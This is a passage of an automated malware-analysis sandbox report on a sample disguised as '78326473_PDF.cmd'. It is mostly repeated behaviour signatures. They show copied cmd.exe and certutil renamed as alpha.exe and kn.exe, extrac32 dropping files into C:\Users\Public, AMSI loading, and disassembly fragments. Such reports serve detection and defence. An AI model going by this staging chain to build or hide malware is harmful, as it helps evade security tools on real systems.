    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMSection loaded: amsi.dllJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: 78326473_PDF.cmdStatic file information: File size 7182316 > 1048576
    Source: Binary string: easinvoker.pdb source: Host.COM, Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
    Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp
    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1304240798.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1307532661.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1324435445.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1307940937.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000000.1324967071.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000009.00000002.1333637540.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1335863717.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1334980904.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.1336518402.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.1337946141.00007FF719692000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
    Source: Binary string: easinvoker.pdbGCTL source: Host.COM, 0000000B.00000003.1338107962.000000007F940000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575784009.0000000002ACE000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337851402.00000000028DD000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2575107446.00000000028E2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2574537137.0000000002116000.00000004.00001000.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1337612777.000000007FAF0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1308414340.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1322812219.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000000.1325401061.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 0000000A.00000002.1332197118.00007FF68AD4E000.00000002.00000001.01000000.00000005.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 11.2.Host.COM.2aa0000.2.unpack, type: UNPACKEDPE
    Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8954 LoadLibraryW,GetProcAddress,FreeLibrary,11_2_02AB8954
    Source: alpha.exe.3.drStatic PE information: section name: .didat
    Source: kn.exe.5.drStatic PE information: section name: .didat
    Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68AC63668 push rsp; ret 7_2_00007FF68AC63669
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACD2FC push 02ACD367h; ret 11_2_02ACD35F
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA63AE push 02AA640Bh; ret 11_2_02AA6403
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA63B0 push 02AA640Bh; ret 11_2_02AA6403
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA332C push eax; ret 11_2_02AA3368
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACC374 push 02ACC56Ah; ret 11_2_02ACC562
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACD0AC push 02ACD125h; ret 11_2_02ACD11D
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB3073 push 02AB30C1h; ret 11_2_02AB30B9
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB3074 push 02AB30C1h; ret 11_2_02AB30B9
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACD1F8 push 02ACD288h; ret 11_2_02ACD280
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABF104 push ecx; mov dword ptr [esp], edx11_2_02ABF109
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACD144 push 02ACD1ECh; ret 11_2_02ACD1E4
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA678A push 02AA67CEh; ret 11_2_02AA67C6
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA678C push 02AA67CEh; ret 11_2_02AA67C6
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AAD5A8 push 02AAD5D4h; ret 11_2_02AAD5CC
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ACC56C push 02ACC56Ah; ret 11_2_02ACC562
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AAC574 push ecx; mov dword ptr [esp], edx11_2_02AAC579
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABAADB push 02ABAB14h; ret 11_2_02ABAB0C
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABAADC push 02ABAB14h; ret 11_2_02ABAB0C
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8AD2 push 02AB8B0Ch; ret 11_2_02AB8B04
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8AD4 push 02AB8B0Ch; ret 11_2_02AB8B04
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AACA26 push 02AACD7Ah; ret 11_2_02AACD72
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AACBF4 push 02AACD7Ah; ret 11_2_02AACD72
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB8874 push 02AB88B6h; ret 11_2_02AB88AE
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02B14850 push eax; ret 11_2_02B14920
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB7914 push 02AB7991h; ret 11_2_02AB7989
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB694E push 02AB69FBh; ret 11_2_02AB69F3
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB6950 push 02AB69FBh; ret 11_2_02AB69F3
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB5E84 push ecx; mov dword ptr [esp], edx11_2_02AB5E86
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AB2F68 push 02AB2FDEh; ret 11_2_02AB2FD6

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Host.COMJump to dropped file
    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\Host.COMJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02AA676A IsIconic,11_2_02AA676A
    Source: C:\Users\Public\Libraries\Host.COMCode function: 11_2_02ABAB18 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_02ABAB18
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\Libraries\Host.COMProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
